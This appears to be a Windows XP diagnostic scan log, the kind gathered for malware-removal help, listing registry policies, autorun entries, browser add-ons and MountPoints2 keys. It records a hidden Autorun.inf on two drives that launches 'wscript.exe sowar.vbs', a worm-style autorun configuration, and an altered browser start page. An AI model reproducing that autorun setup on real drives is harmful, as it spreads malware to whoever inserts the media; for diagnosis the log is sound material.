HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\\shutdownwithoutlogon -> 1 -> 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\\undockwithoutlogon -> 1 -> 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\\InstallVisualStyle -> %SystemRoot%\Resources\Themes\Royale\Royale.mss [C:\WINDOWS\Resources\Themes\Royale\Royale.msstyles] -> File not found
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\\InstallTheme -> %SystemRoot%\Resources\Themes\Royale.the [C:\WINDOWS\Resources\Themes\Royale.theme] -> File not found
< CurrentVersion Policy Settings [HKEY_CURRENT_USER] > -> HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\ -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\ -> ->
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\ActiveDesktop\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\\NoDriveTypeAutoRun -> 36 -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\\NoDriveAutoRun -> FF FF FF FF  [binary data] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System\ -> -> 
< CDROM Autorun Settings > [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom] -> 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\ -> ->
*DependOnGroup* -> HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\\DependOnGroup -> 
SCSI miniport ->  -> File not found
*MultiFile Done* -> -> 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\\ErrorControl -> 1 -> 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\\Group -> SCSI CDROM Class -> 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\\Start -> 1 -> 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\\Tag -> 2 -> 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\\Type -> 1 -> 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\\DisplayName -> CD-ROM Driver -> 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\\ImagePath -> %SystemRoot%\system32\drivers\cdrom.sys [system32\DRIVERS\cdrom.sys] -> Microsoft Corporation [Ver = 5.1.2600.5512 (xpsp.080413-2108) | Size = 62976 bytes | Modified Date = 4/13/2008 11:40:46 AM | Attr =    ]
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\\AutoRun -> 1 -> 
*AutoRunAlwaysDisable* -> HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\\AutoRunAlwaysDisable -> 
NEC     MBR-7    ->  -> File not found
NEC     MBR-7.4  ->  -> File not found
PIONEER CHANGR DRM-1804X ->  -> File not found
PIONEER CD-ROM DRM-6324X ->  -> File not found
PIONEER CD-ROM DRM-624X  ->  -> File not found
TORiSAN CD-ROM CDR_C36 ->  -> File not found
*MultiFile Done* -> -> 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\Enum\ -> -> 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\Enum\\0 -> IDE\CdRomPHILIPS_DVD+-RW_SDVD8820________________AD18____\5&1ba06b6c&0&0.0.0 -> 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\Enum\\Count -> 2 -> 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\Enum\\NextInstance -> 2 -> 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\Enum\\1 -> USBSTOR\CdRom&Ven_SanDisk&Prod_U3_Cruzer_Micro&Rev_4.05\0000167A67740D5B&1 -> 
< Drives - Autoruns > ->  -> 
AUTOEXEC.BAT [] -> %SystemDrive%\AUTOEXEC.BAT [ NTFS ] ->  [Ver =  | Size = 0 bytes | Modified Date = 8/16/2005 3:43:04 AM | Attr =    ]
Autorun.inf [[autorun] | open=wscript.exe sowar.vbs | shell\Open\Command=wscript.exe sowar.vbs | shell\Open\Default=1 | shell\AutoPlay\Command=wscript.exe sowar.vbs | shell\Explore\Command=wscript.exe sowar.vbs | ] -> %SystemDrive%\Autorun.inf [ NTFS ] ->  [Ver =  | Size = 194 bytes | Modified Date = 8/24/2008 7:12:24 PM | Attr = RHS]
autorun.inf [[AutoRun]  | open=LaunchU3.exe -a | icon=LaunchU3.exe,0  |  | [Definitions] | Launchpad=LaunchPad.exe | Vtype=2 |  | [CopyFiles] | FileNumber=1 | File1=LaunchPad.zip |  | [Update] | URL=http://u3.sandisk.com/download/lp_installer.asp?custom=1.4.0.4&brand=cruzer |  |  | [Comment] | brand=cruzer | ] -> E:\autorun.inf [ CDFS ] ->  [Ver =  | Size = 277 bytes | Modified Date = 2/12/2007 12:53:42 PM | Attr = R  ]
autorun.inf [] -> F:\autorun.inf [ FAT ] ->  [Folder | Modified Date = 8/24/2008 9:33:32 AM | Attr = RHS]
Autorun.inf [[autorun] | open=wscript.exe sowar.vbs | shell\Open\Command=wscript.exe sowar.vbs | shell\Open\Default=1 | shell\AutoPlay\Command=wscript.exe sowar.vbs | shell\Explore\Command=wscript.exe sowar.vbs | ] -> G:\Autorun.inf [ FAT32 ] ->  [Ver =  | Size = 194 bytes | Modified Date = 8/24/2008 7:12:26 PM | Attr = RHS]
< HOSTS File > (734 bytes) -> C:\WINDOWS\System32\drivers\etc\Hosts -> 
< Internet Explorer Settings [HKEY_LOCAL_MACHINE\] > -> -> 
HKEY_LOCAL_MACHINE\: Main\\Default_Page_URL -> http://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome -> 
HKEY_LOCAL_MACHINE\: Main\\Default_Search_URL -> http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch -> 
HKEY_LOCAL_MACHINE\: Main\\Local Page -> C:\windows\system32\blank.htm -> 
HKEY_LOCAL_MACHINE\: Main\\Search Page -> http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch -> 
HKEY_LOCAL_MACHINE\: Main\\Start Page -> http://www.microsoft.com/isapi/redir.dll?prd={SUB_PRD}&clcid={SUB_CLSID}&pver={SUB_PVER}&ar=home -> 
HKEY_LOCAL_MACHINE\: Search\\CustomizeSearch -> http://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchcust.htm -> 
HKEY_LOCAL_MACHINE\: Search\\Default_Search_URL -> http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch -> 
HKEY_LOCAL_MACHINE\: Search\\SearchAssistant -> http://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchasst.htm -> 
< Internet Explorer Settings [HKEY_CURRENT_USER\] > -> -> 
HKEY_CURRENT_USER\: Main\\Default_Search_URL -> http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch -> 
HKEY_CURRENT_USER\: Main\\Local Page -> C:\windows\system32\blank.htm -> 
HKEY_CURRENT_USER\: Main\\Search Page -> http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch -> 
HKEY_CURRENT_USER\: Main\\Start Page -> http://www.radzservices.blogspot.com/ -> 
HKEY_CURRENT_USER\: SearchURL\\ -> http://home.microsoft.com/access/autosearch.asp?p=%s[Reg Error: Value provider does not exist or could not be read.] -> 
HKEY_CURRENT_USER\: ProxyEnable -> 0 -> 
HKEY_CURRENT_USER\: ProxyOverride -> *.local -> 
< Trusted Sites Domains [HKEY_LOCAL_MACHINE\] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ -> 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ -> [Key] 1 domain(s) found. -> 
1 domain(s) and sub-domain(s) not assigned to a zone.
< Trusted Sites Ranges [HKEY_LOCAL_MACHINE\] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\ -> 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\ -> [Key] 0 range(s) found. -> 
< Trusted Sites Domains [HKEY_CURRENT_USER\] > -> HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ -> [Key] 3537 domain(s) found. -> 
objects_aol.com [*] -> Out of zone range - ( 5 ) -> 
27 domain(s) and sub-domain(s) not assigned to a zone.
< Trusted Sites Ranges [HKEY_CURRENT_USER\] > -> HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\ -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\ -> [Key] 0 range(s) found. -> 
< BHO's [HKEY_LOCAL_MACHINE] > -> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\ -> 
{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} [HKEY_LOCAL_MACHINE] -> %CommonProgramFiles%\Adobe\Acrobat\ActiveX\AcroIEHelper.dll [Adobe PDF Reader Link Helper] -> Adobe Systems Incorporated [Ver = 8.0.0.2006102200 | Size = 62080 bytes | Modified Date = 10/23/2006 12:08:42 AM | Attr =    ]
{5CA3D70E-1895-11CF-8E15-001234567890} [HKEY_LOCAL_MACHINE] -> %SystemRoot%\system32\dla\tfswshx.dll [DriveLetterAccess] -> Sonic Solutions [Ver = 1.04.08a | Size = 118842 bytes | Modified Date = 12/6/2004 12:05:00 AM | Attr =    ]
{761497BB-D6F0-462C-B6EB-D4DAF1D92D43} [HKEY_LOCAL_MACHINE] -> %ProgramFiles%\Java\jre1.5.0_06\bin\ssv.dll [SSVHelper Class] -> Sun Microsystems, Inc. [Ver = 5.0.60.5 | Size = 184423 bytes | Modified Date = 11/10/2005 12:22:12 PM | Attr =    ]
{7C554162-8CB7-45A4-B8F4-8EA1C75885F9} [HKEY_LOCAL_MACHINE] -> %ProgramFiles%\AOL\AOL Toolbar 5.0\aoltb.dll [AOL Toolbar Launcher] -> AOL LLC [Ver = 5.0.17.1 | Size = 1025584 bytes | Modified Date = 3/23/2007 1:35:30 PM | Attr =    ]
{AA58ED58-01DD-4d91-8333-CF10577473F7} [HKEY_LOCAL_MACHINE] -> %ProgramFiles%\Google\GoogleToolbar2.dll [Google Toolbar Helper] -> Google Inc. [Ver = 4, 0, 1601, 4978 | Size = 2403392 bytes | Modified Date = 2/12/2007 8:19:35 PM | Attr = R  ]
{AF69DE43-7D58-4638-B6FA-CE66B5AD205D} [HKEY_LOCAL_MACHINE] -> %ProgramFiles%\Google\GoogleToolbarNotifier\3.0.1225.9868\swg.dll [Google Toolbar Notifier BHO] -> Google Inc. [Ver = 3, 0, 1225, 9868 | Size = 734704 bytes | Modified Date = 4/12/2008 9:32:37 AM | Attr =    ]
{CA6319C0-31B7-401E-A518-A07C3DB8F777} [HKEY_LOCAL_MACHINE] -> %ProgramFiles%\BAE\BAE.dll [CBrowserHelperObject Object] -> Dell Inc. [Ver = 1.2.0.2 | Size = 98304 bytes | Modified Date = 11/17/2006 10:46:38 AM | Attr =    ]
< Internet Explorer ToolBars [HKEY_LOCAL_MACHINE] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ToolBar -> 
{0BF43445-2F28-4351-9252-17FE6E806AA0} [HKEY_LOCAL_MACHINE] -> Reg Error: Key does not exist or could not be opened. [Reg Error: Key does not exist or could not be opened.] -> File not found
{2318C2B1-4965-11d4-9B18-009027A5CD4F} [HKEY_LOCAL_MACHINE] -> %ProgramFiles%\Google\GoogleToolbar2.dll [&Google] -> Google Inc. [Ver = 4, 0, 1601, 4978 | Size = 2403392 bytes | Modified Date = 2/12/2007 8:19:35 PM | Attr = R  ]
{DE9C389F-3316-41A7-809B-AA305ED9D922} [HKEY_LOCAL_MACHINE] -> %ProgramFiles%\AOL\AOL Toolbar 5.0\aoltb.dll [AOL Toolbar] -> AOL LLC [Ver = 5.0.17.1 | Size = 1025584 bytes | Modified Date = 3/23/2007 1:35:30 PM | Attr =    ]
< Internet Explorer ToolBars [HKEY_CURRENT_USER\] > -> HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\ -> 
WebBrowser\\{2318C2B1-4965-11D4-9B18-009027A5CD4F} [HKEY_LOCAL_MACHINE] -> %ProgramFiles%\Google\GoogleToolbar2.dll [&Google] -> Google Inc. [Ver = 4, 0, 1601, 4978 | Size = 2403392 bytes | Modified Date = 2/12/2007 8:19:35 PM | Attr = R  ]
WebBrowser\\{DE9C389F-3316-41A7-809B-AA305ED9D922} [HKEY_LOCAL_MACHINE] -> %ProgramFiles%\AOL\AOL Toolbar 5.0\aoltb.dll [AOL Toolbar] -> AOL LLC [Ver = 5.0.17.1 | Size = 1025584 bytes | Modified Date = 3/23/2007 1:35:30 PM | Attr =    ]
< Internet Explorer Extensions [HKEY_LOCAL_MACHINE] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extensions\ -> 
{08B0E5C0-4FCB-11CF-AAA5-00401C608501}:{CAFEEFAC-0015-0000-0006-ABCDEFFEDCBC} [HKEY_LOCAL_MACHINE] -> %ProgramFiles%\Java\jre1.5.0_06\bin\NPJPI150_06.dll [Sun Java Console] -> Sun Microsystems, Inc. [Ver = 5.0.60.5 | Size = 69746 bytes | Modified Date = 11/10/2005 12:22:12 PM | Attr =    ]
{08B0E5C0-4FCB-11CF-AAA5-00401C608501}:{CAFEEFAC-0015-0000-0006-ABCDEFFEDCBC} [HKEY_CURRENT_USER] -> %ProgramFiles%\Java\jre1.5.0_06\bin\ssv.dll [Sun Java Console] -> Sun Microsystems, Inc. [Ver = 5.0.60.5 | Size = 184423 bytes | Modified Date = 11/10/2005 12:22:12 PM | Attr =    ]
{3369AF0D-62E9-4bda-8103-B4C75499B578}:{DE9C389F-3316-41A7-809B-AA305ED9D922} [HKEY_LOCAL_MACHINE] -> %ProgramFiles%\AOL\AOL Toolbar 5.0\aoltb.dll [AOL Toolbar] -> AOL LLC [Ver = 5.0.17.1 | Size = 1025584 bytes | Modified Date = 3/23/2007 1:35:30 PM | Attr =    ]
< Internet Explorer Extensions [HKEY_CURRENT_USER\] > -> HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Extensions\ -> 
CmdMapping\\{08B0E5C0-4FCB-11CF-AAA5-00401C608501} [HKEY_LOCAL_MACHINE] -> %ProgramFiles%\Java\jre1.5.0_06\bin\NPJPI150_06.dll [Sun Java Console] -> Sun Microsystems, Inc. [Ver = 5.0.60.5 | Size = 69746 bytes | Modified Date = 11/10/2005 12:22:12 PM | Attr =    ]
CmdMapping\\{3369AF0D-62E9-4bda-8103-B4C75499B578} [HKEY_LOCAL_MACHINE] -> %ProgramFiles%\AOL\AOL Toolbar 5.0\aoltb.dll [AOL Toolbar] -> AOL LLC [Ver = 5.0.17.1 | Size = 1025584 bytes | Modified Date = 3/23/2007 1:35:30 PM | Attr =    ]
< Internet Explorer Menu Extensions [HKEY_CURRENT_USER\] > -> HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\ -> 
&AOL Toolbar Search -> %ProgramFiles%\AOL\AOL Toolbar 5.0\resources\en-us\local\search.html ->  [Ver =  | Size = 747 bytes | Modified Date = 9/7/2006 1:59:50 PM | Attr =    ]
Add to Google Photos Screensa&ver -> %SystemRoot%\system32\GPhotos.scr -> Google Inc. [Ver = 2.0.0.1077 | Size = 2790976 bytes | Modified Date = 9/28/2007 1:42:38 PM | Attr =    ]
< Internet Explorer Plugins [HKEY_LOCAL_MACHINE] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Plugins\ -> 
PluginsPageFriendlyName -> Microsoft ActiveX Gallery -> 
PluginsPage -> http://activex.microsoft.com/controls/find.asp?ext=%s&mime=%s -> 
< DNS Name Servers [HKEY_LOCAL_MACHINE] > -> HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Adapters\ -> 
{A25E3D32-098A-4F0D-A704-9EB8B0587749} ->    (1394 Net Adapter) -> 
{B2894969-D901-400B-BEAC-4704968BED16} ->    (Intel(R) PRO/Wireless 3945ABG Network Connection) -> 
{C6C54C3D-1F8C-4122-90F7-B641D5412825} ->    (Broadcom 440x 10/100 Integrated Controller) -> 
< Winsock2 Catalogs [HKEY_LOCAL_MACHINE] > -> HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\ -> 
NameSpace_Catalog5\Catalog_Entries\000000000005 [mdnsNSP] -> %ProgramFiles%\Bonjour\mdnsNSP.dll -> Apple Computer, Inc. [Ver = 1,0,3,1 | Size = 94208 bytes | Modified Date = 2/28/2006 12:42:30 PM | Attr =    ]
< Protocol Handlers [HKEY_LOCAL_MACHINE] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\ -> 
ipp: [HKEY_LOCAL_MACHINE] -> No CLSID value
msdaipp: [HKEY_LOCAL_MACHINE] -> No CLSID value
< Downloaded Program Files > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\ -> 
{17492023-C23A-453E-A040-C7C580BBF700}[HKEY_LOCAL_MACHINE] -> http://download.microsoft.com/download/8/b/d/8bd77752-5704-4d68-a152-f7252adaa4f2/LegitCheckControl.cab[Windows Genuine Advantage Validation Tool] -> 
{26FCCDF9-A7E1-452A-A73D-7BF7B4D0BA6C}[HKEY_LOCAL_MACHINE] -> http://o.aolcdn.com/pictures/ap/Resources/v2.15/cab/aolpPlugins.10.6.0.8.cab[AOL Pictures Uploader Class] -> 
{8AD9C840-044E-11D1-B3E9-00805F499D93}[HKEY_LOCAL_MACHINE] -> http://java.sun.com/update/1.5.0/jinstall-1_5_0_06-windows-i586.cab[Java Plug-in 1.5.0_06] -> 
{CAFEEFAC-0015-0000-0006-ABCDEFFEDCBA}[HKEY_LOCAL_MACHINE] -> http://java.sun.com/update/1.5.0/jinstall-1_5_0_06-windows-i586.cab[Java Plug-in 1.5.0_06] -> 
{CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA}[HKEY_LOCAL_MACHINE] -> http://java.sun.com/update/1.5.0/jinstall-1_5_0_06-windows-i586.cab[Java Plug-in 1.5.0_06] -> 
< Module Usage Keys [HKEY_LOCAL_MACHINE] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ModuleUsage\ -> 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ModuleUsage\ -> ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ModuleUsage\C:/WINDOWS/system32/LegitCheckControl.DLL\ -> -> 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ModuleUsage\C:/WINDOWS/system32/LegitCheckControl.DLL\\.Owner -> Unknown Owner -> 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ModuleUsage\C:/WINDOWS/system32/LegitCheckControl.DLL\\{17492023-C23A-453E-A040-C7C580BBF700} ->  -> 


[Registry - Additional Scans - Non-Microsoft Only]
< MountPoints2 > -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\ -> ->
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\A\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\A\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\C\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\C\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\D\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\D\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\E\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\E\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\E\\_AutorunStatus -> 01 00 01 00 00 01 00 DF DF 5F 01 00 01 01 EE FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 00 20 00 00 00 09 00 00 00  [binary data] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\E\Shell\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\E\Shell\\ -> AutoRun -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\E\Shell\AutoRun\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\E\Shell\AutoRun\\ -> Auto&Play -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\E\Shell\AutoRun\command\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\E\Shell\AutoRun\command\\ -> E:\LaunchU3.exe [E:\LaunchU3.exe -a] ->  [Ver = 1, 4, 0, 7 | Size = 1110016 bytes | Modified Date = 2/12/2007 6:33:37 PM | Attr = R  ]
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\E\_Autorun\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\E\_Autorun\DefaultIcon\ -> -> 
*~EmptyValue* -> HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\E\_Autorun\DefaultIcon\\ -> 
E:\LaunchU3.exe -> E:\LaunchU3.exe ->  [Ver = 1, 4, 0, 7 | Size = 1110016 bytes | Modified Date = 2/12/2007 6:33:37 PM | Attr = R  ]
0 ->  -> File not found
*MultiFile Done* -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\F\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\F\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\G\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\G\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\H\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\H\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\M\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\M\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\M\\_AutorunStatus -> 01 00 01 00 00 01 00 DF DF 5F DF 5F 5F 5F 5F DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F DF 5F 5F 5F 5F 5F CF 5F 5F 5F 5F 5F CF CF 5F 5F 5F 5F CF CF CF CF CF DF DF DF 5F DF DF 00 5F 5F 5F 5F 5F 5F 5F 5F 5F 5F 00 01 00 00 00 08 00 00 00  [binary data] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{0822e656-f650-11dc-8d6b-00038a000015}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{0822e656-f650-11dc-8d6b-00038a000015}\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{0822e656-f650-11dc-8d6b-00038a000015}\\_AutorunStatus -> 01 00 01 00 00 01 00 DF DF 5F DF 5F 5F 5F 5F DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F DF 5F 5F 5F 5F 5F CF 5F 5F 5F 5F 5F CF CF 5F 5F 5F 5F CF CF CF CF CF DF DF DF 5F DF DF CF 5F 5F 5F 5F 5F 5F 5F 5F 5F 5F 00 01 00 00 00 00 00 00 00  [binary data] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{0822e656-f650-11dc-8d6b-00038a000015}\shell\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{0822e656-f650-11dc-8d6b-00038a000015}\shell\\ -> None -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{0822e656-f650-11dc-8d6b-00038a000015}\shell\Autoplay\ -> -> 
*MUIVerb* -> HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{0822e656-f650-11dc-8d6b-00038a000015}\shell\Autoplay\\MUIVerb -> 
@shell32.dll -> %SystemRoot%\system32\shell32.dll -> Microsoft Corporation [Ver = 6.00.2900.5512 (xpsp.080413-2105) | Size = 8461312 bytes | Modified Date = 4/13/2008 5:12:05 PM | Attr =    ]
-8504 ->  -> File not found
*MultiFile Done* -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{0822e656-f650-11dc-8d6b-00038a000015}\shell\Autoplay\DropTarget\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{0822e656-f650-11dc-8d6b-00038a000015}\shell\Autoplay\DropTarget\\CLSID -> {f26a669a-bcbb-4e37-abf9-7325da15f931} -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{0822e657-f650-11dc-8d6b-00038a000015}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{0822e657-f650-11dc-8d6b-00038a000015}\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{0822e657-f650-11dc-8d6b-00038a000015}\\_AutorunStatus -> 01 00 01 00 00 01 00 DF DF 5F DF 5F 5F 5F 5F DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F DF 5F 5F 5F 5F 5F 01 00 01 01 EE FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 00 01 00 00 00 08 07 00 00  [binary data] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{0822e657-f650-11dc-8d6b-00038a000015}\shell\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{0822e657-f650-11dc-8d6b-00038a000015}\shell\\ -> None -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{0822e657-f650-11dc-8d6b-00038a000015}\shell\Autoplay\ -> -> 
*MUIVerb* -> HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{0822e657-f650-11dc-8d6b-00038a000015}\shell\Autoplay\\MUIVerb -> 
@shell32.dll -> %SystemRoot%\system32\shell32.dll -> Microsoft Corporation [Ver = 6.00.2900.5512 (xpsp.080413-2105) | Size = 8461312 bytes | Modified Date = 4/13/2008 5:12:05 PM | Attr =    ]
-8504 ->  -> File not found
